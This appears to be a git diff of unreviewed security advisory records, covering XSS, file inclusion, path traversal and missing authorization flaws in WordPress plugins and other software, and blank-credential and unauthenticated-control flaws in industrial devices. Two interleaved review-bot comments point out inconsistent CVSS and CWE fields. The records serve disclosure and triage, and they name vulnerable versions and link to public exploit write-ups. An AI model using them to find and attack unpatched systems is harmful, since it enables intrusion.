@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7689-4fm5-8xxm", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-25715" + ], + "details": "The web management interface of the device allows the administrator \nusername and password to be set to blank values. Once applied, the \ndevice permits authentication with empty credentials over the web \nmanagement interface and Telnet service. This effectively disables \nauthentication across all critical management channels, allowing any \nnetwork-adjacent attacker to gain full administrative control without \ncredentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25715" + }, + { + "type": "WEB", + "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-03.json" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-521" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json new file mode 100644 index 0000000000000..302d95675b37d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-76g3-wv5g-g883/GHSA-76g3-wv5g-g883.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-76g3-wv5g-g883", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22352" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PersianScript Persian Woocommerce SMS persian-woocommerce-sms allows Reflected XSS.This issue affects Persian Woocommerce SMS: from n/a through <= 7.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22352" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/persian-woocommerce-sms/vulnerability/wordpress-persian-woocommerce-sms-plugin-7-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7cjr-h9q5-mgrf/GHSA-7cjr-h9q5-mgrf.json b/advisories/unreviewed/2026/02/GHSA-7cjr-h9q5-mgrf/GHSA-7cjr-h9q5-mgrf.json new file mode 100644 index 0000000000000..6a2dfd563f588 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7cjr-h9q5-mgrf/GHSA-7cjr-h9q5-mgrf.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cjr-h9q5-mgrf", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68552" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace WooCommerce Coming Soon Product with Countdown woo-coming-soon-product allows PHP Local File Inclusion.This issue affects WooCommerce Coming Soon Product with Countdown: from n/a through <= 5.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68552" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woo-coming-soon-product/vulnerability/wordpress-woocommerce-coming-soon-product-with-countdown-plugin-5-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7f73-hx35-rw45/GHSA-7f73-hx35-rw45.json b/advisories/unreviewed/2026/02/GHSA-7f73-hx35-rw45/GHSA-7f73-hx35-rw45.json new file mode 100644 index 0000000000000..9b74274baea74 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7f73-hx35-rw45/GHSA-7f73-hx35-rw45.json 
@@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7f73-hx35-rw45", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69400" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThemeREX Yokoo yokoo allows PHP Local File Inclusion.This issue affects Yokoo: from n/a through <= 1.1.11.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69400" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/yokoo/vulnerability/wordpress-yokoo-theme-1-1-11-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7gx4-4vpm-w576/GHSA-7gx4-4vpm-w576.json b/advisories/unreviewed/2026/02/GHSA-7gx4-4vpm-w576/GHSA-7gx4-4vpm-w576.json new file mode 100644 index 0000000000000..92639415f48b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7gx4-4vpm-w576/GHSA-7gx4-4vpm-w576.json 
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7gx4-4vpm-w576",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67992"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in LoftOcean PatioTime patiotime allows PHP Local File Inclusion.This issue affects PatioTime: from n/a through < 2.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67992"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/patiotime/vulnerability/wordpress-patiotime-theme-2-1-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json
new file mode 100644
index 0000000000000..6622c4bdb5a04
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7qvf-m2xc-hg57/GHSA-7qvf-m2xc-hg57.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7qvf-m2xc-hg57",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-24944"
+ ],
+ "details": "Missing Authorization vulnerability in weDevs Subscribe2 subscribe2 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Subscribe2: from n/a through <= 10.44.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24944"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/subscribe2/vulnerability/wordpress-subscribe2-plugin-10-44-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:38Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-82j5-hm8j-jwhq/GHSA-82j5-hm8j-jwhq.json b/advisories/unreviewed/2026/02/GHSA-82j5-hm8j-jwhq/GHSA-82j5-hm8j-jwhq.json
new file mode 100644
index 0000000000000..8ca098153f849
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-82j5-hm8j-jwhq/GHSA-82j5-hm8j-jwhq.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-82j5-hm8j-jwhq",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-24790"
+ ],
+ "details": "The underlying PLC of the device can be remotely influenced, without proper safeguards or authentication.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24790"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-050-04.json"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-050-04"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.welker.com/contact-us/welker-team"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-306"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json
new file mode 100644
index 0000000000000..9822ee51db2cf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-877x-j2fm-2mw5/GHSA-877x-j2fm-2mw5.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-877x-j2fm-2mw5",
+ "modified": "2026-02-20T18:31:37Z",
+ "published": "2026-02-20T18:31:37Z",
+ "aliases": [
+ "CVE-2025-69384"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdiscover Timeline Event History timeline-event-history allows Reflected XSS.This issue affects Timeline Event History: from n/a through <= 3.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69384"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/timeline-event-history/vulnerability/wordpress-timeline-event-history-plugin-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:23Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json
new file mode 100644
index 0000000000000..2f1ee53565a26
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-87jc-9r3r-58w8/GHSA-87jc-9r3r-58w8.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-87jc-9r3r-58w8",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-27505"
+ ],
+ "details": "SVXportal version 2.5 and prior contain a stored cross-site scripting vulnerability in the user registration workflow (index.php submitting to admin/user_action.php). User-supplied fields such as Firstname, lastname, and email are stored in the backend database without adequate output encoding and are later rendered in the administrator interface (admin/users.php), allowing an unauthenticated remote attacker to inject arbitrary JavaScript that executes in an administrator's browser upon viewing the affected page.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27505"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/sa2blv/SVXportal/blob/master/admin/user_action.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.vulncheck.com/advisories/svxportal-admin-user-action-php-stored-xss"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8c32-hp76-8f35/GHSA-8c32-hp76-8f35.json b/advisories/unreviewed/2026/02/GHSA-8c32-hp76-8f35/GHSA-8c32-hp76-8f35.json
new file mode 100644
index 0000000000000..691cf7b26b566
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8c32-hp76-8f35/GHSA-8c32-hp76-8f35.json
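Review bot: In GHSA-87jc-9r3r-58w8 the `CVSS_V4` vector carries `PR:L`, while `details` says the script is injected by "an unauthenticated remote attacker" through the registration form, so the record disagrees with itself on the privileges required. If the description is accurate the vector would read `PR:N`, and the derived `"severity": "MODERATE"` would need recomputing; consumers that triage on the score alone may rank this stored XSS lower than the text warrants. Confirm against the NVD and VulnCheck references listed in the record before relying on either value.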
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8c32-hp76-8f35",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69375"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in SolverWp Portfolio Builder swp-portfolio allows PHP Local File Inclusion.This issue affects Portfolio Builder: from n/a through <= 1.2.5.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69375"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/swp-portfolio/vulnerability/wordpress-portfolio-builder-plugin-1-2-5-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:21Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8f2p-qrq8-3vpg/GHSA-8f2p-qrq8-3vpg.json b/advisories/unreviewed/2026/02/GHSA-8f2p-qrq8-3vpg/GHSA-8f2p-qrq8-3vpg.json
new file mode 100644
index 0000000000000..5cd5cb6a9cdf1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8f2p-qrq8-3vpg/GHSA-8f2p-qrq8-3vpg.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8f2p-qrq8-3vpg",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69376"
+ ],
+ "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish User Extra Fields wp-user-extra-fields allows Path Traversal.This issue affects User Extra Fields: from n/a through <= 17.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69376"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/wp-user-extra-fields/vulnerability/wordpress-user-extra-fields-plugin-17-0-arbitrary-file-deletion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:22Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json b/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json
index a5f3d335da3b9..88f0081adf4c5 100644
--- a/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json
+++ b/advisories/unreviewed/2026/02/GHSA-8g2j-5xh3-r35m/GHSA-8g2j-5xh3-r35m.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-8g2j-5xh3-r35m",
- "modified": "2026-02-19T21:30:48Z",
+ "modified": "2026-02-20T18:31:32Z",
 "published": "2026-02-19T21:30:48Z",
 "aliases": [
 "CVE-2026-27368"
 ],
 "details": "Missing Authorization vulnerability in SeedProd Coming Soon Page, Under Construction & Maintenance Mode by SeedProd coming-soon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Coming Soon Page, Under Construction & Maintenance Mode by SeedProd: from n/a through <= 6.19.7.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T21:18:33Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-8m92-8r47-wxqw/GHSA-8m92-8r47-wxqw.json b/advisories/unreviewed/2026/02/GHSA-8m92-8r47-wxqw/GHSA-8m92-8r47-wxqw.json
new file mode 100644
index 0000000000000..8e1b034d443e5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8m92-8r47-wxqw/GHSA-8m92-8r47-wxqw.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8m92-8r47-wxqw",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2025-15582"
+ ],
+ "details": "A security flaw has been discovered in detronetdip E-commerce 1.0.0. The impacted element is the function Delete/Update of the component Product Management Module. Performing a manipulation of the argument ID results in authorization bypass. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15582"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/detronetdip/E-commerce/issues/23"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Nixon-H/Ecommerce-IDOR-Product-Manipulation"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/detronetdip/E-commerce"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346486"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346486"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754030"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-285"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json
new file mode 100644
index 0000000000000..1e15d52fce9f8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8p6j-8fq8-23rr/GHSA-8p6j-8fq8-23rr.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8p6j-8fq8-23rr",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68880"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in peterwsterling Simple Archive Generator simple-archive-generator allows Reflected XSS.This issue affects Simple Archive Generator: from n/a through <= 5.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68880"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/simple-archive-generator/vulnerability/wordpress-simple-archive-generator-plugin-5-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json
new file mode 100644
index 0000000000000..7a16e09527da0
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8p85-wjp4-3w4m",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26746"
+ ],
+ "details": "OpenSourcePOS 3.4.1 contains a Local File Inclusion (LFI) vulnerability in the Sales.php::getInvoice() function. An attacker can read arbitrary files on the web server by manipulating the Invoice Type configuration. This issue can be chained with the file upload functionality to achieve Remote Code Execution (RCE).",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26746"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hungnqdz/CVE-2026-26746/blob/main/CVE-2026-26746.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/opensourcepos/opensourcepos"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json
new file mode 100644
index 0000000000000..633222197720a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8x43-j6j7-q6vg/GHSA-8x43-j6j7-q6vg.json
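Review bot: GHSA-8p85-wjp4-3w4m is added with `"cwe_ids": []` and `"severity": null` although `details` describes a local file inclusion that can be chained to remote code execution, so any consumer that filters or alerts on CWE or severity will pass over it. The other file-inclusion records in this sync are tagged `"CWE-98"`, which looks like the matching value here, pending upstream assignment. The same gap appears in GHSA-8x43-j6j7-q6vg and GHSA-9jmq-xgjm-p8c2, both described as cross-site scripting, where `"CWE-79"` would match the sibling XSS records; GHSA-c4qg-fgx5-7xg5 also has an empty list. Until these are populated, matching on the `details` text is the only way to catch them.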
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8x43-j6j7-q6vg",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26723"
+ ],
+ "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the function parameter.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26723"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26723"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json b/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json
index 72713145bb4ea..c492b5c604cbd 100644
--- a/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json
+++ b/advisories/unreviewed/2026/02/GHSA-97cw-r9qf-j9qh/GHSA-97cw-r9qf-j9qh.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-97cw-r9qf-j9qh",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-22422"
 ],
 "details": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in wpeverest Everest Forms everest-forms allows Code Injection.This issue affects Everest Forms: from n/a through <= 3.4.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-80"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:11Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json
new file mode 100644
index 0000000000000..269016f3e5da1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-97g7-x3h6-6ccc/GHSA-97g7-x3h6-6ccc.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-97g7-x3h6-6ccc",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-24943"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods Grand Conference grandconference allows Reflected XSS.This issue affects Grand Conference: from n/a through <= 5.3.4.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24943"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/grandconference/vulnerability/wordpress-grand-conference-plugin-5-3-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:38Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-97hf-p3f7-pjq2/GHSA-97hf-p3f7-pjq2.json b/advisories/unreviewed/2026/02/GHSA-97hf-p3f7-pjq2/GHSA-97hf-p3f7-pjq2.json
new file mode 100644
index 0000000000000..90f6a28c765ca
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-97hf-p3f7-pjq2/GHSA-97hf-p3f7-pjq2.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-97hf-p3f7-pjq2",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67987"
